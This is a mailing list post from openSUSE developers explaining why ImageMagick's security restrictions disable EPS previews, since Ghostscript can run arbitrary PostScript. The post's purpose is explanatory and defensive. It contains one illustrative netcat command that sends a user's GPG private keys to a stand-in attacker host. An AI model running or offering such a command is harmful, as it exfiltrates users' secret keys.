Mailinglist Archive: opensuse-factory (443 mails)

< Previous Next >
Re: [opensuse-factory] How to inform users of security settings (boo#713289)

Hello,

On Jul 4 14:24 Cor Blom wrote (excerpt):
Op 04-07-19 om 13:57 schreef Cor Blom:
Op 04-07-19 om 13:45 schreef Marcus Meissner:
On Thu, Jul 04, 2019 at 01:32:39PM +0200, Jan Engelhardt wrote:
On Thursday 2019-07-04 13:06, Cor Blom wrote:

I got a bug report that image preview of eps files was not working in LyX
(boo#713289). I closed this as WONTFIX, because those settings are there for a
reason. What is frustrating for users is: how do they know this is the reason a
preview is not working?

What is even more frustrating for users is that the bug report is not
accessible. So almost nobody can even develop an opinion that you are
trying to elicit.

This is a submitrequest ID for Factory actually ...

+- Update the description in the spec file with information on
+  security setting for ImageMagick in openSUSE. See boo#1139928
+  It seems the only thing we can do about it.

There is the bug, it is open.

Yes, sorry, 713289 was SR number. The bugreport number is #1139928 My mistake.

And the relevant changelog in ImageMagick is:

Thu Feb 28 11:44:05 UTC 2019 - pgajdos@xxxxxxxx

- provide two new (conflicting) packages with configuration
[bsc#1122033]:
* ImageMagick-config-upstream
- provides configuration provided by upstream (no restrictions)
* ImageMagick-config-SUSE (preferred)
- provides configuration provided by SUSE (with security
restrictions)
and use update-alternatives for selecting configurations.
- remove code for < 1315
- deleted patches
- ImageMagick-disable-insecure-coders.patch (renamed)
- added patches
+ ImageMagick-configuration-SUSE.patch

FYI:

For some background information about the root cause behind
all those PostScript/Ghostscript related security issues
see the section
"It is crucial to limit access to CUPS to trusted users" in
https://en.opensuse.org/SDB:CUPS_and_SANE_Firewall_settings
that reads (excerpts):
-------------------------------------------------------------------
PostScript but also PDF to some extent ... is actually a program.
...
PostScript is a general purpose Turing-complete programming
language (cf. https://en.wikipedia.org/wiki/PostScript)
that supports in particular file access on the system disk.
When Ghostscript processes PostScript it runs a PostScript
program as the user who runs Ghostscript ...
When Ghostscript processes an arbitrary PostScript file,
the user who runs Ghostscript runs an arbitrary program
which can do anything on the system where Ghostscript runs
that this user is allowed to do on that system.
To make it safer when Ghostscript runs a PostScript program
the Ghostscript command line option '-dSAFER' disables
certain file access functionality (for details
see /usr/share/doc/ghostscript/*/Use.htm).
...
Its name 'SAFER' says everything: It makes it 'safer'
to let Ghostscript run a PostScript program, but
it does not make it completely safe. -------------------------------------------------------------------


Simply put:

Via some special (but well known) indirections in Ghostscript
a PostScript program or an Encapsulated PostScript [EPS] program
that a user runs via Ghostscript could execute certain stuff
which results basically the equivalent of things like

netcat server.attacker.net 12345 </home/user/.gnupg/private-keys

when an innocent user only liked to view the graphical output
of a malicious PostScript program or convert it into another
(graphical) data type.

Cf.
http://bugzilla.opensuse.org/show_bug.cgi?id=1134327#c13


In the end it means:

By default it must not be allowd to let Ghostscript
(or any other PostScript interpreter) run arbitrary
PostScript programs from (possibly) untrusted origin.


Kind Regards
Johannes Meixner
--
SUSE LINUX GmbH - HRB 21284 (AG Nuernberg)
GF: Felix Imendoerffer, Mary Higgins, Sri Rasiah
< Previous Next >
Follow Ups